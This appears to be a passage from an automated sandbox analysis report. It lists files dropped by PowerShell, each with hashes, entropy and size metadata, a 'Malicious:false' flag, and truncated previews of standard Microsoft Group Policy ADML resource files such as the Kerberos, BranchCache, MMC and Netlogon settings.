                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>KDC Settings</displayName>.. <description>Configuration settings for the Kerberos Key Distribution Center.</description>.. <resources>.. <stringTable>.. <string id="KDC">KDC</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Key Distribution Center (KDC) searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the KDC will search the forests in this list if it is unable to resolve a two-part SPN in the local forest. The forest search is performed by using a glo
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (840), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19138
                                                                                          Entropy (8bit):4.73754316262114
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:7atR7siAzz45FWuozQV/hI+DklrjMvJK1ORt:ebksWnzkhI19OL
                                                                                          MD5:AA29F707B1FE528F5F856EC64E771DAC
                                                                                          SHA1:6F3F897807668918B8A6F7C4E78B17AA445070F9
                                                                                          SHA-256:4148DF3125629ABE00141FACEF7519BBDE4D3877067A234F35C0A63B740810F6
                                                                                          SHA-512:4281194C43BF70E7839FF63107549994D8C89D211317E30557B366C32E30F58505F91AD17E8073869579C6EADA056D8973CD25A489D929FAF796CAE42F5A874E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Kerberos Settings</displayName>.. <description>Configuration settings for the Kerberos authentication protocol.</description>.. <resources>.. <stringTable>.. <string id="kerberos">Kerberos</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Kerberos client searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the Kerberos client searches the forests in this list, if it is unable to resolve a two-part SPN. If a match is found, the Kerberos client requests a re
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6322
                                                                                          Entropy (8bit):4.728370721511469
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm8qDY/ixB4w28Divg6JR+CfREEM2eYJk2y3XTE68TpwQEOgRVLTMV:E9iUw2c0rUEk2yTEZpBmLg
                                                                                          MD5:33F09CDADA6D62BAE3F0DC0A3E1A2C2A
                                                                                          SHA1:62BEEE0D918637A68746741C74244FCF39D1A3FB
                                                                                          SHA-256:3393D80184E3C251A2E8249C13BBBE99A9045AD37550D8497D960371964BF8B7
                                                                                          SHA-512:DE12FA4C934B9A56C86FF7405D3DEBE1D8F3B4AB3ACDD419888FF2399FEDCABC42CFAF26EDA458C0B874D052327B1DC7BE8C454AA4DE0CF7C920F590C40C5BF0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_LanmanServer">Lanman Server</string>.. <string id="Lbl_FollowShare">Allow hash publication only for shared folders on which BranchCache is enabled</string>.. <string id="Lbl_DisableOnAllShares">Disallow hash publication on all shared folders</string>.. <string id="Lbl_EnableOnAllShares">Allow hash publication for all shared folders</string>.. <string id="Pol_HashPublication">Hash Publication for BranchCache</string>.. <string id="Pol_HashPublication_Help">This policy setting specifies w
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1590
                                                                                          Entropy (8bit):4.91680451974178
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKbXSr4eKUsXZ3W5/1n0BsIvFV:LeD5pmnCr4QCW1hCsIvFV
                                                                                          MD5:FAB2C03A061CF266E4BF99D9AD8410CC
                                                                                          SHA1:62C30ED88810E558C2C5B29DF833E0B84979F798
                                                                                          SHA-256:1FAD47D1BCFC5110370B1E428F800DD67B65037C2C029C39355D1F0AF51B4712
                                                                                          SHA-512:2B49196BE14CD1493F98BB4294D50CE42481D67A02357FD6F26067588B4D19B96D7D6677E5A3B6DA5A99329B7422BD5C257C591CBD6C773E5A106EE47E6A2909
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Memory Leak Diagnosis</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines whether Diagnostic Policy Service (DPS) diagnoses memory leak problems.....If you enable or do not configure this policy setting, the DPS enables Windows Memory Leak Diagnosis by default.....If you disable this policy setting, the DPS is not able to diagnose memory leak problems.....
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (460), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3646
                                                                                          Entropy (8bit):4.907043755326407
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKIZNW4D5Drf3R5SMxeHJ/LLXdMD5ebqKrf3R5SfxeHJ/LLgX3jqS0:LeD5pmON3ljPep+sqajiep4X3jqSGvV
                                                                                          MD5:92DBAD98F0E768C7BFE966BD839BB017
                                                                                          SHA1:DE0047F6E6C1A639102804F0D9081783488BB331
                                                                                          SHA-256:14DAFF44ECBEC76CDE21CCC68D5558BD6119A5F58C6884B9692B6341EAD643DD
                                                                                          SHA-512:F74CAACA0D2CE8E4E8702E83E6F077C6BC17BC69CF2BE40698227FE003A7C1291F22D49CB3FEB50A8D418C1083EAE6767474F21AAC7F83A40620F6B461611723
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="LLTD_Category">Link-Layer Topology Discovery</string>.. <string id="LLTD_Category_Help">Configures all Link-Layer Topology Discovery components.</string>.. <string id="LLTD_EnableLLTDIO">Turn on Mapper I/O (LLTDIO) driver</string>.. <string id="LLTD_EnableLLTDIO_Help">This policy setting changes the operational behavior of the Mapper I/O network protocol driver.....LLTDIO allows a computer to discover the topology of a network it's connected to. It also allows a computer to initiate Quality-of-Servic
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1212
                                                                                          Entropy (8bit):4.9162916170648305
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yYr2XjEEgr2WMb/fLqI2LHIQIeQLUgH7IYLjXr2cE5n:cgeD5x8gm8fKBqTETqRXLqbLoQWLUgbU
                                                                                          MD5:FE47798FE9B3F4C43E782DF1AF166A87
                                                                                          SHA1:909EE6F13A9F43305857C64DF1F2B8C91797A60B
                                                                                          SHA-256:F4EDEF9970D1E3EE016E880537DB88D7B6A3B5ABD142D791FC39D39FC4E1FFA9
                                                                                          SHA-512:3487FA625323C52C6BB52C09051CE0C5E41A1EAB45448C5471B2378DFDF6E478DF36E3424F08946B6F1C516E795E138CC87166DF81B4D463B5E04166949FE14E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableWindowsLocationProvider">Turn off Windows Location Provider</string>.. <string id="DisableWindowsLocationProvider_Explain">.. This policy setting turns off the Windows Location Provider feature for this computer..... If you enable this policy setting, the Windows Location Provider feature will be turned off, and all programs on this computer will not be able to use the Windows Location Provider feature..... If you disable or do not configure this policy setting, all programs on this
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (587), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16832
                                                                                          Entropy (8bit):4.631442685712746
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:HD5n9zbzDznNtlY2iFwIcnBJGciF7BZXmhdtP0:nzbzDzn9YPJMGcitzmx0
                                                                                          MD5:7DEB6528B7BF721DA0BC53B65116E4B2
                                                                                          SHA1:999291B1970366D2256B0081EBE8420E6519D13E
                                                                                          SHA-256:CFF8BFAD325C4F3BE418A491D37BB367E126F24EE22FA39C809C83AED6C07033
                                                                                          SHA-512:BC22B74FF1FEA301961650160914422A5A986B7082C27140817E8ABE0E2720CB9578B8EF637182CBAE5CB7E3AC8481F4E334A815645E3F13A82163A7941FEC61
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="UseOEMBackground">Always use custom logon background</string> .. <string id="UseOEMBackground_Help">This policy setting ignores Windows Logon Background.....This policy setting may be used to make Windows give preference to a custom logon background. ....If you enable this policy setting, the logon screen always attempts to load a custom background instead of the Windows-branded logon background. ....If you disable or do not configure this policy setting, Windows uses the default Windows logon background or cu
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (374), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4806
                                                                                          Entropy (8bit):4.701920186548574
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmQsFOr1sf4h/p1IXr5KQ6A735FlZ+HQsvYxyOsFV:EsFOriforIkQ6A7zlZ+HvvYxyOsn
                                                                                          MD5:E7286B16AB9A79A941457D0E5F7AC2D9
                                                                                          SHA1:7E41AA47B450F332DAC6A9AEE8B1021397ACC90F
                                                                                          SHA-256:5CE95BDC6780550FAD262390A824CDB07D6B426683FE1E8AFA533D6A47A8E79B
                                                                                          SHA-512:5BCDA870EF7DCEDA95D4C44B8EDB9DB08BB937D5D5FB07601DE231BA21C7B7902A8D74F6A33352132C0F5D2E84C47E9AE855290444B76EDD6A59792BD8BD67C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC">Microsoft Management Console</string>.. <string id="MMC_ActiveXControl">ActiveX Control</string>.. <string id="MMC_ExtendView">Extended View (Web View)</string>.. <string id="MMC_ExtensionSnapins">Extension snap-ins</string>.. <string id="MMC_LinkToWeb">Link to Web Address</string>.. <string id="MMC_RESTRICT">Restricted/Permitted snap-ins</string>.. <string id="MMC_Restrict_Author">Restrict the user from entering author mode</string>.. <string id="MMC_restrict_Author_Explain"
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (332), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3258
                                                                                          Entropy (8bit):4.817177716053599
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_StorageManagerForSANSSnapIn">Storage Manager for SANs</string>.. <string id="MMC_StorageManagerForSANSSnapInExtension">Storage Manager for SANS Extension</string>.. <string id="MMC_FileServerResourceManagerSnapIn">File Server Resource Manager</string>.. <string id="MMC_FileServerResourceManagerSnapInExtension">File Server Resource Manager Extension</string>.. <string id="MMC_DiskManagementSnapInExtension">Disk Management Extension</string>.. <string id="MMC_DFSSnapIn">DFS Management</st
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10156
                                                                                          Entropy (8bit):4.902850417863983
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_ActiveDirDomTrusts">Active Directory Domains and Trusts</string>.. <string id="MMC_ActiveDirSitesServices">Active Directory Sites and Services</string>.. <string id="MMC_ActiveDirUsersComp">Active Directory Users and Computers</string>.. <string id="MMC_ADMComputers">Administrative Templates (Computers)</string>.. <string id="MMC_ADMUsers">Administrative Templates (Users)</string>.. <string id="MMC_ADSI">ADSI Edit</string>.. <string id="MMC_AppleTalkRouting">AppleTalk Routing</stri
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4822
                                                                                          Entropy (8bit):4.7368864262977635
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Microsoft Support Diagnostic Tool</string>.. <string id="WdiScenarioExecutionPolicy">Microsoft Support Diagnostic Tool: Configure execution level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines the execution level for Microsoft Support Diagnostic Tool.....Microsoft Support Diagnostic Tool (MSDT) gathers diagnostic data for analysis by support professionals.....If you enable this policy setting, administrators can use MSDT to collect and send di
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (499), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):30569
                                                                                          Entropy (8bit):4.629506484487412
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowLockdownBrowse">Allow users to browse for source while elevated</string>.. <string id="AllowLockdownBrowse_Help">This policy setting allows users to search for installation files during privileged installations.....If you enable this policy setting, the Browse button in the "Use feature from" dialog box is enabled. As a result, users can search for installation files even when the installation program is running with elevated system privileges.....Because the installation is running with elevated system p
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1133
                                                                                          Entropy (8bit):4.94325326862628
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MediaCenter">Windows Media Center</string>.. <string id="MediaCenter_Disable">Do not allow Windows Media Center to run</string>.. <string id="MediaCenter_Disable_Help">This policy setting allows or prevents Windows Media Center to run.....Windows Media Center is a digital media player and video recorder that allows users to organize and play music and videos, and to view and record live television.....If you enable this policy setting, Windows Media Center will not run.....If you disable or do not configu
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1205
                                                                                          Entropy (8bit):4.9534177597350935
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MobilityCenterCat">Windows Mobility Center</string>.. <string id="MobilityCenterEnable">Turn off Windows Mobility Center</string>.. <string id="MobilityCenterEnableExplain">This policy setting turns off Windows Mobility Center.....If you enable this policy setting, the user is unable to invoke Windows Mobility Center. The Windows Mobility Center UI is removed from all shell entry points and the .exe file does not launch it.....If you disable this policy setting, the user is able to invoke Windows Mobility
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1482
                                                                                          Entropy (8bit):4.847847941024891
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PresentationSettingsCat">Presentation Settings</string>.. <string id="PresentationSettingsEnable">Turn off Windows presentation settings</string>.. <string id="PresentationSettingsEnableExplain">This policy setting turns off Windows presentation settings.....If you enable this policy setting, Windows presentation settings cannot be invoked.....If you disable this policy setting, Windows presentation settings can be invoked. The presentation settings icon will be displayed in the notification area. This wi
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3082
                                                                                          Entropy (8bit):4.810214089047188
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">MSI Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure MSI Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted MSI files to one of three states:....Prompt for Resolution: Detection, troubleshooting, and recovery of corrupted MSI applications will be turned on. Windows will prompt the user with a dialog box when application reinstallat
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.0468646750436905
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NAP_Category">Network Access Protection</string>.. <string id="NAP_XP_1x_QEC">Allow the Network Access Protection client to support the 802.1x Enforcement Client component</string>.. <string id="NAP_XP_1x_Help">This policy setting allows the Network Access Protection (NAP) client to support the Windows XP version of the 802.1x Enforcement Client component.....If you enable this policy setting, NAP allows the Windows XP version of the 802.1x Wireless Enforcement Client to participate. ....If you disa
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (417), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5609
                                                                                          Entropy (8bit):4.807720215972321
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Connectivity Status Indicator Group Policy Settings</displayName>.. <description>Network Connectivity Status Indicator Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="NCSI_Category">Network Connectivity Status Indicator</string>.. <string id="NCSI_CorpWebProbeUrl">Specify corporate Website probe URL</string>.. <string id="NCSI_CorpWebProbeUrl_Help">This policy setting enables you to specify the URL of the corporate website, against which an active probe is performed.</string>.. <string id="NCSI_CorpDnsProbeHost">Specify corporate DNS probe host name</string>.. <string id="NCSI_CorpDnsPro
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1008), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):46428
                                                                                          Entropy (8bit):4.777664679838725
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Netlogon">Net Logon</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain">Use DNS name resolution with a single-label domain name instead of NetBIOS name resolution to locate the DC</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain_Help">This policy setting specifies whether the computers to which this setting is applied attempt DNS name resolution of a single-label domain names.....By default, the behavior specified in the AllowDnsSuffixSearch is used. If the AllowDnsSuffixSearch policy is d
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1486), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):41991
                                                                                          Entropy (8bit):4.576451646468249
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NC_AddRemoveComponents">Prohibit adding and removing components for a LAN or remote access connection</string>.. <string id="NC_AddRemoveComponents_Help">Determines whether administrators can add and remove network components for a LAN or remote access connection. This setting has no effect on nonadministrators.....If you enable this setting (and enable the "Enable Network Connections settings for Administrators" setting), the Install and Uninstall buttons for components of connections are disabled, and admini
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:exported SGML document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6746
                                                                                          Entropy (8bit):4.9079819692940125
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview: (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Isolation </displayName>.. <description>Configures Network Isolation Options for apps </description>.. <resources>.. <stringTable>.. .<string id="WF_Isolation">Network Isolation</string>........ Define server addresses that proxy to the Internet -->......<string id="WF_NetIsolation_Domain_Proxies">Internet proxy servers for apps</string> ...<string id="WF_NetIsolation_Domain_Proxies_Help"> This setting does not apply to desktop apps......A semicolon-separated list of Internet proxy server IP addresses. These addresses are categorized as Internet by Windows Network Isolation and are accessible to apps that have the Internet Client or Internet Client/Server capabilities....
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2267
                                                                                          Entropy (8bit):4.838388154516794
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNetworkProjector">Turn off Connect to a Network Projector</string>.. <string id="DisableNetworkProjectorExplain">This policy setting disables the Connect to a Network Projector wizard so that users cannot connect to a network projector. ....If you enable this policy setting, users cannot use the Connect to a Network Projector Wizard to connect to a projector. ....If you disable or do not configure this policy setting, users can run the Connect to a Network Projector Wizard to connect to a projector.</st
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (634), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):50909
                                                                                          Entropy (8bit):4.7108422069629725
                                                                                          Encrypted:false
                                                                                          Malicious:false
